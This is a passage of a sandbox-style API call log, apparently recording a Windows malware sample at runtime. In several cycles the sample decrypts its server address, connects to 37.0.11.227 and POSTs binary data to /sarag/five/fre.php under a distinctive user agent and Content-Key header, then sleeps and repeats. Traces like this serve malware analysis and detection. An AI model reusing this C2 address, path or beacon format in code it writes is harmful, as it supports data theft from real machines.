(HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0274.639] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.640] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.640] GetProcessHeap () returned 0x690000 [0274.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0274.640] GetProcessHeap () returned 0x690000 [0274.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.641] send (s=0x850, buf=0x6ad508*, len=242, flags=0) returned 242 [0274.642] send (s=0x850, buf=0x6aba40*, len=159, flags=0) returned 159 [0274.642] GetProcessHeap () returned 0x690000 [0274.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0274.642] recv (in: s=0x850, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0274.746] GetProcessHeap () returned 0x690000 [0274.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0274.747] GetProcessHeap () returned 0x690000 [0274.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.747] GetProcessHeap () returned 0x690000 [0274.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0274.747] GetProcessHeap () returned 0x690000 [0274.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0274.748] closesocket (s=0x850) returned 0 [0274.748] GetProcessHeap () returned 0x690000 [0274.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0274.748] GetProcessHeap () returned 0x690000 [0274.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.749] GetProcessHeap () returned 0x690000 [0274.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0274.749] GetProcessHeap () returned 0x690000 [0274.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0274.749] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x160c) returned 0x850 [0274.752] Sleep (dwMilliseconds=0xea60) [0274.755] GetProcessHeap () returned 0x690000 [0274.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0274.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0274.773] GetProcessHeap () returned 0x690000 [0274.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0274.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.777] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.799] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.799] GetProcessHeap () returned 0x690000 [0274.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0274.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.801] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0274.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.802] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.804] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0274.804] GetProcessHeap () returned 0x690000 [0274.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.805] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.806] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.807] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.811] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.811] GetProcessHeap () returned 0x690000 [0274.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0274.811] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.811] GetProcessHeap () returned 0x690000 [0274.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0274.812] GetProcessHeap () returned 0x690000 [0274.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.813] GetProcessHeap () returned 0x690000 [0274.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0274.814] GetProcessHeap () returned 0x690000 [0274.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0274.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.823] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0274.840] GetProcessHeap () returned 0x690000 [0274.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0274.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.842] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.843] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.845] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.845] GetProcessHeap () returned 0x690000 [0274.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0274.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.848] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0274.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.849] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.850] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0274.850] GetProcessHeap () returned 0x690000 [0274.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.851] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0274.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.855] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0274.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.856] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0274.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.857] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0274.857] GetProcessHeap () returned 0x690000 [0274.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0274.857] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0274.857] GetProcessHeap () returned 0x690000 [0274.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0274.857] socket (af=2, type=1, protocol=6) returned 0x854 [0274.857] connect (s=0x854, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0274.881] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0274.881] GetProcessHeap () returned 0x690000 [0274.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0274.881] GetProcessHeap () returned 0x690000 [0274.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0274.882] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.883] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.883] GetProcessHeap () returned 0x690000 [0274.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0274.883] GetProcessHeap () returned 0x690000 [0274.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.884] GetProcessHeap () returned 0x690000 [0274.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0274.884] GetProcessHeap () returned 0x690000 [0274.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0274.887] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.888] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.888] GetProcessHeap () returned 0x690000 [0274.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0274.888] GetProcessHeap () returned 0x690000 [0274.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.888] send (s=0x854, buf=0x6ad508*, len=242, flags=0) returned 242 [0274.889] send (s=0x854, buf=0x6aba40*, len=159, flags=0) returned 159 [0274.889] GetProcessHeap () returned 0x690000 [0274.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0274.889] recv (in: s=0x854, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0274.982] GetProcessHeap () returned 0x690000 [0274.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0274.983] GetProcessHeap () returned 0x690000 [0274.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0274.983] GetProcessHeap () returned 0x690000 [0274.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0274.984] GetProcessHeap () returned 0x690000 [0274.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0274.984] closesocket (s=0x854) returned 0 [0274.986] GetProcessHeap () returned 0x690000 [0274.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0274.986] GetProcessHeap () returned 0x690000 [0274.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.986] GetProcessHeap () returned 0x690000 [0274.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.986] GetProcessHeap () returned 0x690000 [0274.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0274.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1610) returned 0x854 [0274.989] Sleep (dwMilliseconds=0xea60) [0274.991] GetProcessHeap () returned 0x690000 [0274.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0274.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0275.022] GetProcessHeap () returned 0x690000 [0275.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0275.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.036] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.037] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.038] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.038] GetProcessHeap () returned 0x690000 [0275.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0275.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.039] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0275.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.040] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.041] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0275.041] GetProcessHeap () returned 0x690000 [0275.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.042] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.043] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.044] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.049] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.049] GetProcessHeap () returned 0x690000 [0275.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0275.049] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.050] GetProcessHeap () returned 0x690000 [0275.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0275.050] GetProcessHeap () returned 0x690000 [0275.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0275.051] GetProcessHeap () returned 0x690000 [0275.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0275.051] GetProcessHeap () returned 0x690000 [0275.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0275.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.061] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0275.068] GetProcessHeap () returned 0x690000 [0275.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0275.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.070] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0275.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.071] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.072] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.072] GetProcessHeap () returned 0x690000 [0275.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0275.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.074] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0275.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.075] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0275.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0275.076] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0275.076] GetProcessHeap () returned 0x690000 [0275.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0275.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0275.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.079] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0275.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.083] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0275.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0275.084] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0275.084] GetProcessHeap () returned 0x690000 [0275.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0275.084] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0275.084] GetProcessHeap () returned 0x690000 [0275.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0275.084] socket (af=2, type=1, protocol=6) returned 0x858 [0275.085] connect (s=0x858, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0275.121] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0275.121] GetProcessHeap () returned 0x690000 [0275.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0275.121] GetProcessHeap () returned 0x690000 [0275.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0275.121] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.122] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.122] GetProcessHeap () returned 0x690000 [0275.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0275.122] GetProcessHeap () returned 0x690000 [0275.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.125] GetProcessHeap () returned 0x690000 [0275.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0275.125] GetProcessHeap () returned 0x690000 [0275.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0275.125] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0275.126] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.126] GetProcessHeap () returned 0x690000 [0275.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0275.126] GetProcessHeap () returned 0x690000 [0275.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0275.127] send (s=0x858, buf=0x6ad508*, len=242, flags=0) returned 242 [0275.127] send (s=0x858, buf=0x6aba40*, len=159, flags=0) returned 159 [0275.128] GetProcessHeap () returned 0x690000 [0275.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0275.128] recv (in: s=0x858, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0275.259] GetProcessHeap () returned 0x690000 [0275.260] HeapFree (in: hHeap=0x690000, 